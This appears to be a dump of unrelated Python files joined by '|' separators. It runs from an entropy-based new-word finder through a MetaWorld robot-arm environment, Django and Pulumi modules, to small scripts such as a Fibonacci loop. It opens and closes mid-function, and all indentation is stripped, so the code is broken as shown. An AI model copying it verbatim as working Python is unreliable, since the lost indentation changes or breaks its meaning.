mul_info2 = ml * total_word / (word_freq[left_word[-1]] * word_freq[left_word[:-1]])
mul_info = min(mul_info1, mul_info2)
if mul_info > min_mtro:
if left_word in l_dict:
l_dict[left_word].append(freq)
else:
l_dict[left_word] = [ml, freq]
right_word = word[1:]
mr = word_freq[right_word]
if mr > min_freq:
mul_info1 = mr * total_word / (word_freq[right_word[1:]] * word_freq[right_word[0]])
mul_info2 = mr * total_word / (word_freq[right_word[-1]] * word_freq[right_word[:-1]])
mul_info = min(mul_info1, mul_info2)
if mul_info > min_mtro:
if right_word in r_dict:
r_dict[right_word].append(freq)
else:
r_dict[right_word] = [mr, freq]
return l_dict, r_dict
def cal_entro(r_dict):
entro_r_dict = {}
for word in r_dict:
m_list = r_dict[word]
r_list = m_list[1:]
fm = m_list[0]
entro_r = 0
krm = fm - sum(r_list)
if krm > 0:
entro_r -= 1 / fm * log(1 / fm, 2) * krm
for rm in r_list:
entro_r -= rm / fm * log(rm / fm, 2)
entro_r_dict[word] = entro_r
return entro_r_dict
def entro_lr_fusion(entro_r_dict, entro_l_dict):
entro_in_rl_dict = {}
entro_in_r_dict = {}
entro_in_l_dict = entro_l_dict.copy()
for word in entro_r_dict:
if word in entro_l_dict:
entro_in_rl_dict[word] = [entro_l_dict[word], entro_r_dict[word]]
entro_in_l_dict.pop(word)
else:
entro_in_r_dict[word] = entro_r_dict[word]
return entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict
def entro_filter(entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict, word_freq, min_entro):
entro_dict = {}
l, r, rl = 0, 0, 0
for word in entro_in_rl_dict:
if entro_in_rl_dict[word][0] > min_entro and entro_in_rl_dict[word][1] > min_entro:
entro_dict[word] = word_freq[word]
rl += 1
for word in entro_in_l_dict:
if entro_in_l_dict[word] > min_entro:
entro_dict[word] = word_freq[word]
l += 1
for word in entro_in_r_dict:
if entro_in_r_dict[word] > min_entro:
entro_dict[word] = word_freq[word]
r += 1
return entro_dict
def new_word_find(input_file, output_file):
min_freq = 10
min_mtro = 80
min_entro = 3
word_freq = count_words(input_file)
total_word = sum(word_freq.values())
l_dict, r_dict = lrg_info(word_freq, total_word, min_freq, min_mtro)
entro_r_dict = cal_entro(l_dict)
entro_l_dict = cal_entro(r_dict)
entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict = entro_lr_fusion(entro_r_dict, entro_l_dict)
entro_dict = entro_filter(entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict, word_freq, min_entro)
result = sorted(entro_dict.items(), key=lambda x: x[1], reverse=True)
with open(output_file, 'w', encoding='utf-8') as kf:
for w, m in result:
kf.write(w + '\t%d\n' % m)
|
import os
from approvaltests.core.writer import Writer
class StringWriter(Writer):
contents = ''
def __init__(self, contents, extension='.txt'):
self.contents = contents or ''
self.extension_with_dot = extension
def write_received_file(self, received_file):
self.create_directory_if_needed(received_file)
with open(received_file, 'w') as f:
f.write(self.contents)
return received_file
@staticmethod
def create_directory_if_needed(received_file):
directory = os.path.dirname(received_file)
if directory and not os.path.exists(directory):
os.makedirs(directory)
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Sawyer environment for pushing objects."""
import metaworld.envs.mujoco.cameras as camera_configs
from metaworld.google import glfw
import mujoco_py
import numpy as np
from collections import OrderedDict
from gym.spaces import Dict, Box
from metaworld.envs.env_util import get_stat_in_paths, \
create_stats_ordered_dict, get_asset_full_path
from metaworld.envs.mujoco.sawyer_xyz.base import SawyerXYZEnv
from metaworld.envs.mujoco.utils.rotation import euler2quat
from metaworld.envs.mujoco.sawyer_xyz.base import OBS_TYPE
sideview_cam = camera_configs.create_sawyer_camera_init(
lookat=(0.2, 0.75, 0.4),
distance=0.8,
elevation=-55,
azimuth=180,
trackbodyid=-1,
)
topview_cam = camera_configs.create_sawyer_camera_init(
lookat=(0., 1.0, 0.5),
distance=0.6,
elevation=-45,
azimuth=270,
trackbodyid=-1,
)
# list of changes
# object position has been changed to have lower variance
# the constant for pushing reward has been changed from 1000 -> 10
# added reset_goal function
# the observation "with_goal" has been changed
class SawyerReachPushPickPlaceEnv(SawyerXYZEnv):
def __init__(
self,
random_init=False,
task_types=['pick_place', 'reach', 'push'],
task_type='pick_place',
obs_type='plain',
goal_low=(-0.1, 0.8, 0.05),
goal_high=(0.1, 0.9, 0.3),
liftThresh=0.04,
sampleMode='equal',
rotMode='fixed', #'fixed',
**kwargs):
self.quick_init(locals())
hand_low = (-0.5, 0.40, 0.05)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.02, 0.58, 0.02)
obj_high = (0.02, 0.62, 0.02)
SawyerXYZEnv.__init__(
self,
frame_skip=5,
action_scale=1. / 100,
hand_low=hand_low,
hand_high=hand_high,
model_name=self.model_name,
**kwargs)
self.task_type = task_type
self.init_config = {
'obj_init_angle': .3,
'obj_init_pos': np.array([0, 0.6, 0.02]),
'hand_init_pos': np.array([0, .6, .2]),
}
# we only do one task from [pick_place, reach, push]
# per instance of SawyerReachPushPickPlaceEnv.
# Please only set task_type from constructor.
if self.task_type == 'pick_place':
self.goal = np.array([0.1, 0.8, 0.2])
elif self.task_type == 'reach':
self.goal = np.array([-0.1, 0.8, 0.2])
elif self.task_type == 'push':
self.goal = np.array([0.1, 0.8, 0.02])
else:
raise NotImplementedError
self.obj_init_angle = self.init_config['obj_init_angle']
self.obj_init_pos = self.init_config['obj_init_pos']
self.hand_init_pos = self.init_config['hand_init_pos']
assert obs_type in OBS_TYPE
self.obs_type = obs_type
if goal_low is None:
goal_low = self.hand_low
if goal_high is None:
goal_high = self.hand_high
self.random_init = random_init
self.liftThresh = liftThresh
self.max_path_length = 150
self.rotMode = rotMode
self.sampleMode = sampleMode
self.task_types = task_types
if rotMode == 'fixed':
self.action_space = Box(
np.array([-1, -1, -1, -1]),
np.array([1, 1, 1, 1]),
)
elif rotMode == 'rotz':
self.action_rot_scale = 1. / 50
self.action_space = Box(
np.array([-1, -1, -1, -np.pi, -1]),
np.array([1, 1, 1, np.pi, 1]),
)
elif rotMode == 'quat':
self.action_space = Box(
np.array([-1, -1, -1, 0, -1, -1, -1, -1]),
np.array([1, 1, 1, 2 * np.pi, 1, 1, 1, 1]),
)
else:
self.action_space = Box(
np.array([-1, -1, -1, -np.pi / 2, -np.pi / 2, 0, -1]),
np.array([1, 1, 1, np.pi / 2, np.pi / 2, np.pi * 2, 1]),
)
self.obj_and_goal_space = Box(
np.hstack((obj_low, goal_low)),
np.hstack((obj_high, goal_high)),
)
self.goal_space = Box(np.array(goal_low), np.array(goal_high))
if self.obs_type == 'plain':
self.observation_space = Box(
np.hstack((
self.hand_low,
obj_low,
)),
np.hstack((
self.hand_high,
obj_high,
)),
)
elif self.obs_type == 'with_goal':
self.observation_space = Box(
np.hstack((self.hand_low, obj_low, goal_low)),
np.hstack((self.hand_high, obj_high, goal_high)),
)
else:
raise NotImplementedError('If you want to use an observation\
with_obs_idx, please discretize the goal space after instantiate an environment.'
)
self.num_resets = 0
self.reset()
def get_goal(self):
return {
'state_desired_goal': self._state_goal,
}
@property
def model_name(self):
return get_asset_full_path(
'sawyer_xyz/sawyer_reach_push_pick_and_place.xml')
def step(self, action):
if self.rotMode == 'euler':
action_ = np.zeros(7)
action_[:3] = action[:3]
action_[3:] = euler2quat(action[3:6])
self.set_xyz_action_rot(action_)
elif self.rotMode == 'fixed':
self.set_xyz_action(action[:3])
elif self.rotMode == 'rotz':
self.set_xyz_action_rotz(action[:4])
else:
self.set_xyz_action_rot(action[:7])
self.do_simulation([action[-1], -action[-1]])
# The marker seems to get reset every time you do a simulation
self._set_goal_marker(self._state_goal)
ob = self._get_obs()
obs_dict = self._get_obs_dict()
reward, reachRew, reachDist, pushRew, pushDist, pickRew, placeRew, placingDist = self.compute_reward(
action, obs_dict, mode=self.rewMode, task_type=self.task_type)
self.curr_path_length += 1
#info = self._get_info()
if self.curr_path_length == self.max_path_length:
done = True
else:
done = False
goal_dist = placingDist if self.task_type == 'pick_place' else pushDist
if self.task_type == 'reach':
success = float(reachDist <= 0.05)
else:
success = float(goal_dist <= 0.07)
info = {
'reachDist': reachDist,
'pickRew': pickRew,
'epRew': reward,
'goalDist': goal_dist,
'success': success
}
info['goal'] = self._state_goal
return ob, reward, done, info
def _get_obs(self):
hand = self.get_endeff_pos()
objPos = self.data.get_geom_xpos('objGeom')
flat_obs = np.concatenate(
(hand, objPos - hand)) # delta position from the hand
if self.obs_type == 'with_goal_and_id':
return np.concatenate([flat_obs, self._state_goal, self._state_goal_idx])
elif self.obs_type == 'with_goal':
return np.concatenate([flat_obs, self._state_goal - objPos
]) # delta position of the goal from the object
elif self.obs_type == 'plain':
return np.concatenate([
flat_obs,
]) # TODO ZP do we need the concat?
else:
return np.concatenate([flat_obs, self._state_goal_idx])
def _get_obs_dict(self):
hand = self.get_endeff_pos()
objPos = self.data.get_geom_xpos('objGeom')
flat_obs = np.concatenate((hand, objPos))
return dict(
state_observation=flat_obs,
state_desired_goal=self._state_goal,
state_achieved_goal=objPos,
)
def _get_info(self):
pass
def _set_goal_marker(self, goal):
"""
This should be use ONLY for visualization. Use self._state_goal for
logging, learning, etc.
"""
self.data.site_xpos[self.model.site_name2id('goal_{}'.format(
self.task_type))] = (
goal[:3])
for task_type in self.task_types:
if task_type != self.task_type:
self.data.site_xpos[self.model.site_name2id(
'goal_{}'.format(task_type))] = (
np.array([10.0, 10.0, 10.0]))
def _set_objCOM_marker(self):
"""
This should be use ONLY for visualization. Use self._state_goal for
logging, learning, etc.
"""
objPos = self.data.get_geom_xpos('objGeom')
self.data.site_xpos[self.model.site_name2id('objSite')] = (objPos)
def _set_obj_xyz(self, pos):
qpos = self.data.qpos.flat.copy()
qvel = self.data.qvel.flat.copy()
qpos[9:12] = pos.copy()
qvel[9:15] = 0
self.set_state(qpos, qvel)
def sample_goals(self, batch_size):
# Required by HER-TD3
goals = self.sample_goals_(batch_size)
if self.discrete_goal_space is not None:
goals = [self.discrete_goals[g].copy() for g in goals]
return {
'state_desired_goal': goals,
}
def sample_task(self):
idx = self.sample_goals_(1)
return self.discrete_goals[idx]
def adjust_initObjPos(self, orig_init_pos):
#This is to account for meshes for the geom and object are not aligned
#If this is not done, the object could be initialized in an extreme position
diff = self.get_body_com('obj')[:2] - self.data.get_geom_xpos('objGeom')[:2]
adjustedPos = orig_init_pos[:2] + diff
#The convention we follow is that body_com[2] is always 0, and geom_pos[2] is the object height
return [
adjustedPos[0], adjustedPos[1],
self.data.get_geom_xpos('objGeom')[-1]
]
def reset_goal(self, goal=None):
# choose one of the discrete ends for a goal if none is given
if goal is None:
discrete_goal_list = np.array([[0.0, 0.9, 0.02], [0.0, 0.3, 0.02],
[-0.3, 0.6, 0.02], [0.3, 0.6, 0.02]])
goal_idx = [
0, 2, 3
][np.random.choice(3)] # skip the back goal as it is not reachable
goal = discrete_goal_list[goal_idx]
solve_reverse_task = np.random.choice(
1) # goal-object reversal to simulate potential reset problems
if solve_reverse_task:
goal = np.concatenate([goal[:2], [self.obj_init_pos[-1]]])
self.obj_init_pos, goal = goal, self.obj_init_pos
self._set_obj_xyz(self.obj_init_pos)
# update the chosen goal in environment
self._state_goal = np.concatenate((goal[:2], [self.obj_init_pos[-1]]))
self._set_goal_marker(self._state_goal)
# update quantities for reward calculation
rightFinger, leftFinger = self.get_site_pos(
'rightEndEffector'), self.get_site_pos('leftEndEffector')
self.init_fingerCOM = (rightFinger + leftFinger) / 2
self.maxReachDist = np.linalg.norm(self.init_fingerCOM -
np.array(self._state_goal))
self.maxPushDist = np.linalg.norm(self.obj_init_pos[:2] -
np.array(self._state_goal)[:2])
self.maxPlacingDist = np.linalg.norm(
np.array(
[self.obj_init_pos[0], self.obj_init_pos[1], self.heightTarget]) -
np.array(self._state_goal)) + self.heightTarget
self.target_rewards = [
1000 * self.maxPlacingDist + 1000 * 2,
1000 * self.maxReachDist + 1000 * 2, 10 * self.maxPushDist + 10 * 2
]
if self.task_type == 'reach':
idx = 1
elif self.task_type == 'push':
idx = 2
else:
idx = 0
self.target_reward = self.target_rewards[idx]
def reset_model(self):
self._reset_hand()
self._state_goal = self.goal.copy()
self.obj_init_pos = self.adjust_initObjPos(self.init_config['obj_init_pos'])
self.obj_init_angle = self.init_config['obj_init_angle']
self.objHeight = self.data.get_geom_xpos('objGeom')[2]
self.heightTarget = self.objHeight + self.liftThresh
if self.random_init:
goal_pos = np.random.uniform(
self.obj_and_goal_space.low,
self.obj_and_goal_space.high,
size=(self.obj_and_goal_space.low.size),
)
if self.task_type == 'push':
self.obj_init_pos = np.concatenate(
(goal_pos[:2], [self.obj_init_pos[-1]]))
else:
self.obj_init_pos = goal_pos[:3]
self._set_obj_xyz(self.obj_init_pos)
self.reset_goal() # segregate the call to goal resetting for reuse later
#self._set_obj_xyz_quat(self.obj_init_pos, self.obj_init_angle)
self.curr_path_length = 0
self.num_resets += 1
return self._get_obs()
def reset_model_to_idx(self, idx):
raise NotImplementedError('This API is deprecated! Please explicitly\
call `set_goal_` then reset the environment.')
def _reset_hand(self):
for _ in range(10):
self.data.set_mocap_pos('mocap', self.hand_init_pos)
self.data.set_mocap_quat('mocap', np.array([1, 0, 1, 0]))
self.do_simulation([-1, 1], self.frame_skip)
rightFinger, leftFinger = self.get_site_pos(
'rightEndEffector'), self.get_site_pos('leftEndEffector')
self.init_fingerCOM = (rightFinger + leftFinger) / 2
self.pickCompleted = False
def get_site_pos(self, siteName):
_id = self.model.site_names.index(siteName)
return self.data.site_xpos[_id].copy()
def compute_rewards(self, actions, obsBatch):
#Required by HER-TD3
assert isinstance(obsBatch, dict) == True
obsList = obsBatch['state_observation']
rewards = [
self.compute_reward(action, obs, task_type=self.task_type)[0]
for action, obs in zip(actions, obsList)
]
return np.array(rewards)
def compute_reward(self, actions, obs, mode='general', task_type='reach'):
if isinstance(obs, dict):
obs = obs['state_observation']
objPos = obs[3:6]
rightFinger, leftFinger = self.get_site_pos(
'rightEndEffector'), self.get_site_pos('leftEndEffector')
fingerCOM = (rightFinger + leftFinger) / 2
heightTarget = self.heightTarget
goal = self._state_goal
def compute_reward_reach(actions, obs, mode):
c1 = 1000
c2 = 0.01
c3 = 0.001
reachDist = np.linalg.norm(fingerCOM - goal)
# reachRew = -reachDist
# if reachDist < 0.1:
# reachNearRew = 1000*(self.maxReachDist - reachDist) + c1*(np.exp(-(reachDist**2)/c2) + np.exp(-(reachDist**2)/c3))
# else:
# reachNearRew = 0.
reachRew = c1 * (self.maxReachDist - reachDist) + c1 * (
np.exp(-(reachDist**2) / c2) + np.exp(-(reachDist**2) / c3))
reachRew = max(reachRew, 0)
# reachNearRew = max(reachNearRew,0)
# reachRew = -reachDist
reward = reachRew # + reachNearRew
return [reward, reachRew, reachDist, None, None, None, None, None]
def compute_reward_push(actions, obs, mode):
c1 = 10
c2 = 0.01
c3 = 0.001
assert np.all(goal == self.get_site_pos('goal_push'))
reachDist = np.linalg.norm(fingerCOM - objPos)
pushDist = np.linalg.norm(objPos[:2] - goal[:2])
reachRew = -reachDist
if reachDist < 0.05:
# pushRew = -pushDist
pushRew = c1 * (self.maxPushDist - pushDist) + c1 * (
np.exp(-(pushDist**2) / c2) + np.exp(-(pushDist**2) / c3))
pushRew = max(pushRew, 0)
else:
pushRew = 0
reward = self.reach_reward_scale * reachRew + pushRew
return [reward, reachRew, reachDist, pushRew, pushDist, None, None, None]
def compute_reward_pick_place(actions, obs, mode):
reachDist = np.linalg.norm(objPos - fingerCOM)
placingDist = np.linalg.norm(objPos - goal)
assert np.all(goal == self.get_site_pos('goal_pick_place'))
def reachReward():
reachRew = -reachDist # + min(actions[-1], -1)/50
reachDistxy = np.linalg.norm(objPos[:-1] - fingerCOM[:-1])
zRew = np.linalg.norm(fingerCOM[-1] - self.init_fingerCOM[-1])
if reachDistxy < 0.05: #0.02
reachRew = -reachDist
else:
reachRew = -reachDistxy - 2 * zRew
#incentive to close fingers when reachDist is small
if reachDist < 0.05:
reachRew = -reachDist + max(actions[-1], 0) / 50
return reachRew, reachDist
def pickCompletionCriteria():
tolerance = 0.01
if objPos[2] >= (heightTarget - tolerance):
return True
else:
return False
if pickCompletionCriteria():
self.pickCompleted = True
def objDropped():
return (objPos[2] <
(self.objHeight + 0.005)) and (placingDist >
0.02) and (reachDist > 0.02)
# Object on the ground, far away from the goal, and from the gripper
#Can tweak the margin limits
def objGrasped(thresh=0):
sensorData = self.data.sensordata
return (sensorData[0] > thresh) and (sensorData[1] > thresh)
def orig_pickReward():
# hScale = 50
hScale = 100
# hScale = 1000
if self.pickCompleted and not (objDropped()):
return hScale * heightTarget
# elif (reachDist < 0.1) and (objPos[2]> (self.objHeight + 0.005)) :
elif (reachDist < 0.1) and (objPos[2] > (self.objHeight + 0.005)):
return hScale * min(heightTarget, objPos[2])
else:
return 0
def general_pickReward():
hScale = 50
if self.pickCompleted and objGrasped():
return hScale * heightTarget
elif objGrasped() and (objPos[2] > (self.objHeight + 0.005)):
return hScale * min(heightTarget, objPos[2])
else:
return 0
def placeReward():
# c1 = 1000 ; c2 = 0.03 ; c3 = 0.003
c1 = 1000
c2 = 0.01
c3 = 0.001
if mode == 'general':
cond = self.pickCompleted and objGrasped()
else:
cond = self.pickCompleted and (reachDist < 0.1) and not (objDropped())
if cond:
placeRew = 1000 * (self.maxPlacingDist - placingDist) + c1 * (
np.exp(-(placingDist**2) / c2) + np.exp(-(placingDist**2) / c3))
placeRew = max(placeRew, 0)
return [placeRew, placingDist]
else:
return [0, placingDist]
reachRew, reachDist = reachReward()
if mode == 'general':
pickRew = general_pickReward()
else:
pickRew = orig_pickReward()
placeRew, placingDist = placeReward()
assert ((placeRew >= 0) and (pickRew >= 0))
reward = self.reach_reward_scale * reachRew + pickRew + placeRew
return [
reward, reachRew, reachDist, None, None, pickRew, placeRew,
placingDist
]
if task_type == 'reach':
return compute_reward_reach(actions, obs, mode)
elif task_type == 'push':
return compute_reward_push(actions, obs, mode)
else:
return compute_reward_pick_place(actions, obs, mode)
def get_diagnostics(self, paths, prefix=''):
statistics = OrderedDict()
return statistics
def log_diagnostics(self, paths=None, logger=None):
pass
class SawyerObject(SawyerReachPushPickPlaceEnv):
def set_max_path_length(self, length):
self.max_path_length = length
def set_camera_view(self, view):
self._camera_view = view
def _get_viewer(self, mode):
self.viewer = self._viewers.get(mode)
if self.viewer is None:
if 'rgb_array' in mode:
self.viewer = mujoco_py.MjRenderContextOffscreen(
self.sim, device_id=self.device_id)
self.viewer_setup()
self._viewers[mode] = self.viewer
return super()._get_viewer(mode)
def viewer_setup(self):
if self._camera_view == 'topview':
topview_cam(self.viewer.cam)
elif self._camera_view == 'sideview':
sideview_cam(self.viewer.cam)
else:
camera_configs.init_sawyer_camera_v1(self.viewer.cam)
def close(self):
if self.viewer is not None and not isinstance(
self.viewer, mujoco_py.MjRenderContextOffscreen):
glfw.destroy_window(self.viewer.window)
self.viewer = None
|
from dexy.doc import Doc
from tests.utils import TEST_DATA_DIR
from tests.utils import assert_output
from tests.utils import runfilter
from tests.utils import wrap
from nose.exc import SkipTest
import os
import shutil
def test_phantomjs_render_filter():
with runfilter("phrender", "<p>hello</p>") as doc:
assert doc.output_data().is_cached()
def test_phantomjs_stdout_filter():
assert_output('phantomjs', PHANTOM_JS, "Hello, world!\n")
def test_casperjs_svg2pdf_filter():
raise SkipTest() # TODO fix this - if casper is missing should raise error before reach assertions
# TODO find smaller file - make test go faster?
with wrap() as wrapper:
orig = os.path.join(TEST_DATA_DIR, 'butterfly.svg')
shutil.copyfile(orig, 'butterfly.svg')
from dexy.wrapper import Wrapper
wrapper = Wrapper()
node = Doc("butterfly.svg|svg2pdf", wrapper)
wrapper.run_docs(node)
assert node.output_data().is_cached()
assert node.output_data().filesize() > 1000
def test_casperjs_stdout_filter():
with wrap() as wrapper:
node = Doc("example.js|casperjs",
wrapper,
[],
contents=CASPER_JS,
casperjs={"add-new-files" : True }
)
wrapper.run_docs(node)
try:
assert 'doc:google.pdf' in wrapper.nodes
assert 'doc:cookies.txt' in wrapper.nodes
except AssertionError:
pass
PHANTOM_JS = """
console.log('Hello, world!');
phantom.exit();
"""
CASPER_JS = """
var links = [];
var casper = require('casper').create();
casper.start('http://google.com/', function() {
this.capture('google.pdf');
});
casper.run();
"""
|
"""
针对FairMOT模型中多个解耦头的实现 一个相对独立的部分 没有做过其它更改
"""
import torch.nn as nn
from ..utils.weights_init import fill_fc_weights
class CommonHead(nn.Module):
"""
公共头部分的实现
"""
def __init__(self, heads, head_conv = 256):
super(CommonHead, self).__init__()
self.heads = heads
self.head_conv = head_conv
for head in self.heads:
# 设置通道数目
channels = self.heads[head]
if head_conv > 0:
head_layer = nn.Sequential(
nn.Conv2d(64, head_conv, kernel_size=3, padding=1, bias=True),
nn.ReLU(inplace=True),
nn.Conv2d(head_conv, channels, kernel_size=1, stride=1, padding=0, bias=True)
)
if 'hm' in head:
head_layer[-1].bias.data.fill_(-2.19)
else:
fill_fc_weights(head_layer)
# 直接输出通道数中间不会加任何的卷积操作
else:
head_layer = nn.Conv2d(64, channels, kernel_size=1, stride=1, padding=0, bias=True)
if 'hm' in head:
head_layer.bias.data.fill_(-2.19)
else:
fill_fc_weights(head_layer)
# 设置为模型的属性
self.__setattr__(head, head_layer)
def forward(self, x):
# get heads outputs
ret = {}
for head in self.heads:
ret[head] = self.__getattr__(head)(x)
return [ret]
|
# Obtener el n-número de fibonacci
# Usando ciclos
def fib(n):
x1 = 0
x2 = 1
contador = 3
xn = 0
i = 0
while contador <= n:
print("iteracion: ", i)
i = i + 1
xn = x1 + x2
x1 = x2
x2 = xn
contador = contador + 1
if n == 1:
xn = x1
if n == 2:
xn = x2
return xn
print (fib(10))
|
# Generated by Django 2.0.5 on 2018-05-25 03:07
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('child', '0005_auto_20180524_2143'),
]
operations = [
migrations.AlterField(
model_name='medicalupdate',
name='child',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='medical_update', to='child.Child'),
),
]
|
from .hugo2lunr import main
|
from django.urls import include, path
from drf_spectacular.views import (SpectacularAPIView, SpectacularRedocView,
SpectacularSwaggerView)
from talana.apps.api.users import urls as users_urls
app_name = 'api'
urlpatterns = [
path('users/', include(users_urls, namespace='users')),
]
docs_urlpatterns = [
path('schema/', SpectacularAPIView.as_view(), name='schema'),
path('redoc/',
SpectacularRedocView.as_view(url_name='schema'),
name='redoc'),
path('swagger/',
SpectacularSwaggerView.as_view(url_name='schema'),
name='swagger-ui'),
]
urlpatterns += docs_urlpatterns
|
"""
Kelly Kapowski algorithm with computing cortical thickness
"""
__all__ = ['kelly_kapowski']
from ..core import ants_image as iio
from .. import utils
def kelly_kapowski(s, g, w, its=45, r=0.025, m=1.5, **kwargs):
"""
Compute cortical thickness using the DiReCT algorithm.
Diffeomorphic registration-based cortical thickness based on probabilistic
segmentation of an image. This is an optimization algorithm.
Arguments
---------
s : ANTsimage
segmentation image
g : ANTsImage
gray matter probability image
w : ANTsImage
white matter probability image
its : integer
convergence params - controls iterations
r : scalar
gradient descent update parameter
m : scalar
gradient field smoothing parameter
kwargs : keyword arguments
anything else, see KellyKapowski help in ANTs
Returns
-------
ANTsImage
Example
-------
>>> import ants
>>> img = ants.image_read( ants.get_ants_data('r16') ,2)
>>> img = ants.resample_image(img, (64,64),1,0)
>>> mask = ants.get_mask( img )
>>> segs = ants.kmeans_segmentation( img, k=3, kmask = mask)
>>> thick = ants.kelly_kapowski(s=segs['segmentation'], g=segs['probabilityimages'][1],
w=segs['probabilityimages'][2], its=45,
r=0.5, m=1)
"""
if isinstance(s, iio.ANTsImage):
s = s.clone('unsigned int')
d = s.dimension
outimg = g.clone()
kellargs = {'d': d,
's': s,
'g': g,
'w': w,
'c': its,
'r': r,
'm': m,
'o': outimg}
for k, v in kwargs.items():
kellargs[k] = v
processed_kellargs = utils._int_antsProcessArguments(kellargs)
libfn = utils.get_lib_fn('KellyKapowski')
libfn(processed_kellargs)
return outimg
|
from setuptools import setup, find_packages
setup(
name='blockex-tradeapi',
version='1.0.0rc1',
description='Python client library for BlockEx Trade API',
url='',
author='D. Petrov, BlockEx',
author_email='developers@blockex.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
keywords='api client blockex trade api',
install_requires=['enum34', 'six', 'requests'],
extras_require={
'test': ['mock'],
},
project_urls={
'Bug Reports': '',
'Source': '',
},
)
|
from django import template
from django.utils.safestring import mark_safe
from blog.models import Category, Comment, Article, Tags
# 这里的register不能随便修改
register = template.Library()
@register.simple_tag
def get_category_list(): # 可以定义任意名称函
return Category.objects.all()
@register.simple_tag
def get_comment_list(): # 可以定义任意名称函
return Comment.objects.order_by('-add_date')[:5]
@register.simple_tag
def get_month_list(): # 按月份进行匹配归档
return Article.objects.dates('add_date', 'month', order='DESC')
@register.simple_tag
def get_tags_list(): # 侧边栏显示所有标签
return Tags.objects.all()
|
import csv
with open("Datasets/favorite_colors.csv", "r") as f:
data = csv.DictReader(f)
table = {}
for student in data:
grade = student["grade"]
color = student["favorite_color"]
if grade not in table:
table[grade] = {}
if color not in table[grade]:
table[grade][color] = 0
table[grade][color] += 1
print(table)
total = 0
for grade in table:
total += table[grade]["yellow"]
print(total)
total = sum(table[grade]["yellow"] for grade in table)
print(total)
# print(table)
#table = {
# "9": {
# "blue": 5,
# "red": 6,
# "yellow": 7
# }
#},
#"10": {...}
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetTransactionNodeResult',
'AwaitableGetTransactionNodeResult',
'get_transaction_node',
]
@pulumi.output_type
class GetTransactionNodeResult:
"""
Payload of the transaction node which is the request/response of the resource provider.
"""
def __init__(__self__, dns=None, firewall_rules=None, location=None, name=None, password=None, provisioning_state=None, public_key=None, type=None, user_name=None):
if dns and not isinstance(dns, str):
raise TypeError("Expected argument 'dns' to be a str")
pulumi.set(__self__, "dns", dns)
if firewall_rules and not isinstance(firewall_rules, list):
raise TypeError("Expected argument 'firewall_rules' to be a list")
pulumi.set(__self__, "firewall_rules", firewall_rules)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if password and not isinstance(password, str):
raise TypeError("Expected argument 'password' to be a str")
pulumi.set(__self__, "password", password)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if public_key and not isinstance(public_key, str):
raise TypeError("Expected argument 'public_key' to be a str")
pulumi.set(__self__, "public_key", public_key)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if user_name and not isinstance(user_name, str):
raise TypeError("Expected argument 'user_name' to be a str")
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def dns(self) -> str:
"""
Gets or sets the transaction node dns endpoint.
"""
return pulumi.get(self, "dns")
@property
@pulumi.getter(name="firewallRules")
def firewall_rules(self) -> Optional[Sequence['outputs.FirewallRuleResponse']]:
"""
Gets or sets the firewall rules.
"""
return pulumi.get(self, "firewall_rules")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Gets or sets the transaction node location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def password(self) -> Optional[str]:
"""
Sets the transaction node dns endpoint basic auth password.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
Gets or sets the blockchain member provision state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> str:
"""
Gets or sets the transaction node public key.
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the service - e.g. "Microsoft.Blockchain"
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userName")
def user_name(self) -> str:
"""
Gets or sets the transaction node dns endpoint basic auth user name.
"""
return pulumi.get(self, "user_name")
class AwaitableGetTransactionNodeResult(GetTransactionNodeResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTransactionNodeResult(
dns=self.dns,
firewall_rules=self.firewall_rules,
location=self.location,
name=self.name,
password=self.password,
provisioning_state=self.provisioning_state,
public_key=self.public_key,
type=self.type,
user_name=self.user_name)
def get_transaction_node(blockchain_member_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
transaction_node_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTransactionNodeResult:
"""
Use this data source to access information about an existing resource.
:param str blockchain_member_name: Blockchain member name.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str transaction_node_name: Transaction node name.
"""
